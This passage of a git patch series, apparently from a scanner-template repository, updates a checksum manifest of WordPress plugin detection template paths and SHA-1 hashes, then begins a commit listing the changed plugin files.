+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6497,7 +6498,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:b7c24084e03395bb9aeb9331095b03c5dda896e9 +templates-checksum.txt:57e9fe7c13d3657e2a352ba3fa1d2e9800067c69 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 892c13bce10c956ada1ad25fde1468f84914afb1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 05:51:10 +0000 Subject: [PATCH 379/609] TemplateMan Update [Wed Jul 5 05:51:10 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml 